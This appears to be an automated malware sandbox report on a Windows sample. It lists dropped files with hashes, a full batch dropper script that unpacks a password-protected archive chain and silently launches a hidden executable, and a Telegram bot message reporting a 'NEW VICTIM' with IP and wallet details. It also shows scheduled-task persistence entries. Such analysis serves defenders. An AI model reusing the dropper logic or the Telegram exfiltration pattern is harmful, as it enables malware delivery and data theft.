Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:	98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	true
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
SSDEEP:	12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Reputation:	unknown
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Local\Temp\tmppd546uv4\gen_py\init.py

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.713840781302666
Encrypted:	false
SSDEEP:	3:S3yE25MOWrYXtHVE/DRFrgm5/gvJgXDLAUDA+ERo6+aEYqVS1f6gq1WGgVSBn:S3mSOWWHVUDjrgmxgRgzLXDA6Va8VeuR
MD5:	8C7CA775CF482C6027B4A2D3DB0F6A31
SHA1:	E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A
SHA-256:	52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
SHA-512:	19C7D229723249885B125121B3CC86E8C571360C1FB7F2AF92B251E6354A297B4C2B9A28E708F2394CA58C35B20987F8B65D9BD6543370F063BBD59DB4A186AC
Malicious:	false
Reputation:	unknown
Preview:	# Generated file - this directory may be deleted to reset the COM cache.....import win32com..if __path__[:-1] != win32com.__gen_path__: __path__.append(win32com.__gen_path__)..

C:\Users\user\AppData\Local\Temp\tmppd546uv4\gen_py\dicts.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
File Type:	data
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.7219280948873625
Encrypted:	false
SSDEEP:	3:qW6:qW6
MD5:	2C7344F3031A5107275CE84AED227411
SHA1:	68ACAD72A154CBE8B2D597655FF84FD31D57C43B
SHA-256:	83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
SHA-512:	F58362C70A2017875D231831AE5868DF22D0017B00098A28AACB5753432E8C4267AA7CBF6C5680FEB2DC9B7ABADE5654C3651685167CC26AA208A9EB71528BB6
Malicious:	false
Reputation:	unknown
Preview:	..K....}..

C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	303
Entropy (8bit):	4.9485431528176616
Encrypted:	false
SSDEEP:	6:5LKS39zKE0g6cJv1Vpv//fTdD3Dd5LJW1CRW35jY:934g6cJv1j/Xn3WV5k
MD5:	6F52D4DB1877B789A41E3D246FE72071
SHA1:	48ABD4ED82586E3872427C3D56926D944C2863B3
SHA-256:	BB0E62DF940826B0F7D7DF84E86192B1ABCF027153A2F65D9BF2E14419198F3A
SHA-512:	7AABB236FFB855699AE947681CFADA064AD3DA7CECDD78B8928E0DC5AB000D166327842B4598968317AFC614B0F6396F33ED80DD4B85D8345E544A7A0C858476
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "89.187.171.165",. "hostname": "unn-89-187-171-165.cdn77.com",. "city": "Atlanta",. "region": "Georgia",. "country": "US",. "loc": "33.7490,-84.3880",. "org": "AS60068 Datacamp Limited",. "postal": "30302",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	772
Entropy (8bit):	5.0855142862079035
Encrypted:	false
SSDEEP:	24:YKOHWy1JVBa4YGQVPe071kWlFPyoZERkQJE7BYTlc:YVHWQTBj/Q513PtZgu9ulc
MD5:	E92637EF5482AEAD85E59E5AC4B7775D
SHA1:	E2E536FFC91E75CA15A1903B962B138818D34E80
SHA-256:	8734582073BE10A10C7094F6B144C8E9E502FE12E320EBC9E3A5EB064EB2FEED
SHA-512:	A72980876EAED23B575DC723F345985AB3DCD912481C9602028FA89A9C6DF2B1E7241D4B5D844682D5DF4BCCB533F1909861122A9B725C3833E31101512F328C
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":11787,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734218496,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 89.187.171.165\nDevice Name: 704672\nLocation: Atlanta, Georgia, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":14,"type":"url"},{"offset":63,"length":12,"type":"bold"},{"offset":83,"length":9,"type":"bold"},{"offset":114,"length":8,"type":"bold"},{"offset":123,"length":13,"type":"code"}]}}

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4515725992198174
Encrypted:	false
SSDEEP:	6:TLXPQXUEZ+lX1lOJUPelkDdt7DY8uy0lqt0:P4Q1lOmeeDD2Vqt0
MD5:	E33654AD48F7A864A965E8FC47400743
SHA1:	C2465105519A79AE2027B3D8A6DDFA53521F4D97
SHA-256:	726689CD9D549FF866C3DDD4A155A9123D3D9D563A42D0FD31D9E9D0EFD400E9
SHA-512:	342AEE3C096D2126AB85F23045AABFC53A84603265F88E34A0F5E5BAB62EA455F2B95B80030535B462D1DBC02C0BD1B95E017AB3CD48ABD73799F9E18134CA83
Malicious:	false
Reputation:	unknown
Preview:	.....F.k'..H......r.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........W.1.0.6.4._.0.3.\.A.r.t.h.u.r...................0...................@3P.........................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.4243201142247948
Encrypted:	false
SSDEEP:	6:vjU5VXsQXUEZ+lX1CGdKUe6t7DY8uy0l1t0:v45RJQ1CGAFE2V1t0
MD5:	1EA42F3D04071F54E8A59547D742B546
SHA1:	8B22D7E6906871867B9D62D6A4FB4E050C4B36E6
SHA-256:	60C725A5D738F60EB4F3FE9198E5BBB5F7FF3138267A5E71906F4B999C86EEDB
SHA-512:	38BA9B976569F9A98AC6AF125E3C504FF6AC163D450288B478C2DE98F79B625A5A6184654946AE4C699F4064C73ABFBB8439B06FF8A7F22EA9B79274B01FCB64
Malicious:	false
Reputation:	unknown
Preview:	..... .m..{O.b..1zZ.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........W.1.0.6.4._.0.3.\.A.r.t.h.u.r...................0...................@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.0682682106683945
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
MD5:	2F644B7E25627553C5731B735473C859
SHA1:	5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
SHA-256:	2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
SHA-512:	E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
Malicious:	false
Reputation:	unknown
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.522411107697113
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'028'480 bytes
MD5:	524aff0ae21cf7d4731596e8f3967e32
SHA1:	27a75996dfd0ae578e28613f275b0517c0bbd975
SHA256:	a9ce24b52ece47dfb287b912c5223c5b659df5c2fece87141dfa5820ecda23fd
SHA512:	b65d7bb349d6fee6714bd5b92f2cdad7e69a6d9ddeb6f4cddc808d18a4982a5c9e3cfdaab842667f7fb2c94a8c809aeab5bfe229ca696152d08f3ee453d29334
SSDEEP:	49152:d626AK+dEI8BfYkpYTuxh5h4p7FTa0NhxmZB:wnAKiEIUdp7xh49tRNcB
TLSH:	49E53992B409E6CFE48A16B98427CDC26D6D07FD4B5509C3A878747EBD63CC122B5C2E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x71e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF994A067AAh
unpcklps xmm5, dqword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31cae4	0x10	syfpipoa
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31ca94	0x18	syfpipoa
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	0f8a499b6448a9fb97322d52eceec177	False	0.9983555432561307	data	7.986233657501117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x344	0x400	982623c07c43a8169da5c3bd55ce4d06	False	0.4345703125	data	5.395849414192414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
